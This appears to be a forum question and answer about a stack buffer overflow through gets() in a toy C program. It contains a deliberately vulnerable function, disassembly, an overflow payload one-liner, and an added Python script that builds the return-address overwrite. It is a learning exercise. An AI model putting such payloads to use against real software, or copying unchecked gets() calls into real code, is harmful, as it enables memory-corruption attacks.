exploiting Buffer Overflow using gets() in a simple C program
I am new to Buffer Overflow exploits and I started with a simple C program.
Code
#include <stdio.h>
#include <strings.h>

/* Never called by main; the goal of the exploit is to redirect execution here. */
void execs(void){
    printf("yay!!");   /* no newline: stdout stays buffered until a flush or normal exit */
}

void return_input (void)
{
    char array[30];
    gets(array);       /* no length check: longer input overwrites the saved ebp and the return address */
}

int main()
{
    return_input();
    return 0;
}
Compilation stage
I compiled the above program with cc, disabling the stack protector, as:
cc test.c -o test -fno-stack-protector
The dump of the ELF file using objdump is as follows:
0804843b <execs>:
804843b: 55 push %ebp
804843c: 89 e5 mov %esp,%ebp
804843e: 83 ec 08 sub $0x8,%esp
8048441: 83 ec 0c sub $0xc,%esp
8048444: 68 10 85 04 08 push $0x8048510
8048449: e8 b2 fe ff ff call 8048300 <printf@plt>
804844e: 83 c4 10 add $0x10,%esp
8048451: 90 nop
8048452: c9 leave
8048453: c3 ret
08048454 <return_input>:
8048454: 55 push %ebp
8048455: 89 e5 mov %esp,%ebp
8048457: 83 ec 28 sub $0x28,%esp
804845a: 83 ec 0c sub $0xc,%esp
804845d: 8d 45 da lea -0x26(%ebp),%eax
8048460: 50 push %eax
8048461: e8 aa fe ff ff call 8048310 <gets@plt>
8048466: 83 c4 10 add $0x10,%esp
8048469: 90 nop
804846a: c9 leave
804846b: c3 ret
0804846c <main>:
804846c: 8d 4c 24 04 lea 0x4(%esp),%ecx
8048470: 83 e4 f0 and $0xfffffff0,%esp
8048473: ff 71 fc pushl -0x4(%ecx)
8048476: 55 push %ebp
8048477: 89 e5 mov %esp,%ebp
8048479: 51 push %ecx
804847a: 83 ec 04 sub $0x4,%esp
804847d: e8 d2 ff ff ff call 8048454 <return_input>
8048482: b8 00 00 00 00 mov $0x0,%eax
8048487: 83 c4 04 add $0x4,%esp
804848a: 59 pop %ecx
804848b: 5d pop %ebp
804848c: 8d 61 fc lea -0x4(%ecx),%esp
804848f: c3 ret
So, in order to exploit the buffer (array), we need to find the number of bytes allocated in the return_input stack frame, which, looking at the dump,
lea -0x26(%ebp),%eax
is 0x26 in hex, or 38 in decimal. So, giving input as:
38+4(random chars)+(return addr of execs)
would execute the execs function. I used the following:
python -c 'print "a"*42+"\x3b\x84\x04\x08"' | ./test
But the output was an error:
Segmentation fault (core dumped)
When I opened the core (core dump file) using gdb, I could see that the segmentation fault happened when executing at the following address:
0xb76f2300
System information:
Ubuntu version: 16.10
Kernel version: 4.8.0-46-generic
Question
What was I doing wrong in the code?
I guess the reason is simple: you didn't halt / abort your program in execs. That address 0xb76f2300 is on the stack, so I suspect it is the return from execs that fails when it tries to return to the value of the stored stack pointer.
That you don't see any message is because stdout is line-buffered, and your message didn't have a new-line character, nor did you flush it explicitly; thus the yay!! will still be in the buffers.
Also, use a debugger.
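As an added example (not part of the question or the answer above), the following Python 3 script derives the padding from the objdump line quoted in the question, packs the address of execs little-endian, and builds the same 46-byte payload as the one-liner in the question. It also adds the two checks a practitioner wants before piping bytes into gets(): that the address contains no 0x0a byte (gets() stops reading at a newline, so such an address can never arrive intact), and an optional second return address for the slot that execs' own ret will pop, which is the "halt / abort" point the answer makes. The address constants come from the dump in the question; which address to put in next_ret (for example the address of a function that exits cleanly) is left to the reader and is an assumption, not something the page supplies. The asker's one-liner is Python 2; under Python 3, print would emit text, so the script writes raw bytes to sys.stdout.buffer.

```python
import re
import struct
import sys

# Values taken from the objdump output in the question (32-bit, little-endian assumed).
TARGET_EXECS = 0x0804843B
LEA_LINE = "804845d: 8d 45 da lea -0x26(%ebp),%eax"   # copied from the dump of return_input
SAVED_EBP_SIZE = 4   # 32-bit frame: saved ebp sits at ebp, the return address at ebp+4


def buffer_offset_from_lea(line):
    """Parse 'lea -0xNN(%ebp),%eax' and return NN, the distance from the
    start of the buffer to the saved ebp of the frame."""
    m = re.search(r"lea\s+-0x([0-9a-fA-F]+)\(%ebp\)", line)
    if not m:
        raise ValueError("no ebp-relative lea in: " + line)
    return int(m.group(1), 16)


def padding_to_return_address(buf_offset):
    """Bytes that must be written before the saved return address is reached:
    the buffer itself plus the 4-byte saved ebp that sits just above it."""
    return buf_offset + SAVED_EBP_SIZE


def gets_safe(addr):
    """gets() terminates input at '\\n' (0x0a), so an address whose encoding
    contains that byte cannot be delivered through gets()."""
    return b"\n" not in struct.pack("<I", addr)


def build_payload(buf_offset, target, next_ret=None, filler=b"a"):
    """filler * (buf_offset + 4) + target [+ next_ret].

    target    - overwrites return_input's saved return address (here: execs).
    next_ret  - optional; lands where execs' own 'ret' will pop. Without it,
                that slot holds whatever gets() left there, which is why the
                original run crashed after execs returned. What to put here
                (e.g. the address of a clean exit path) is an assumption of
                this example, not something the page provides.
    """
    if not gets_safe(target) or (next_ret is not None and not gets_safe(next_ret)):
        raise ValueError("address contains 0x0a; gets() would truncate the payload")
    payload = filler * padding_to_return_address(buf_offset) + struct.pack("<I", target)
    if next_ret is not None:
        payload += struct.pack("<I", next_ret)
    return payload


def main():
    offset = buffer_offset_from_lea(LEA_LINE)          # 0x26 == 38
    payload = build_payload(offset, TARGET_EXECS)      # 42 filler bytes + execs address
    # Raw bytes, not text, so it can be piped straight into ./test:
    #   python3 payload.py | ./test
    sys.stdout.buffer.write(payload + b"\n")


if __name__ == "__main__":
    main()
```

The padding of 42 is exactly the asker's 38 + 4: 0x26 bytes from the buffer start up to the saved ebp, plus the 4 bytes of saved ebp itself, after which the next 4 bytes replace the return address that return_input's ret pops.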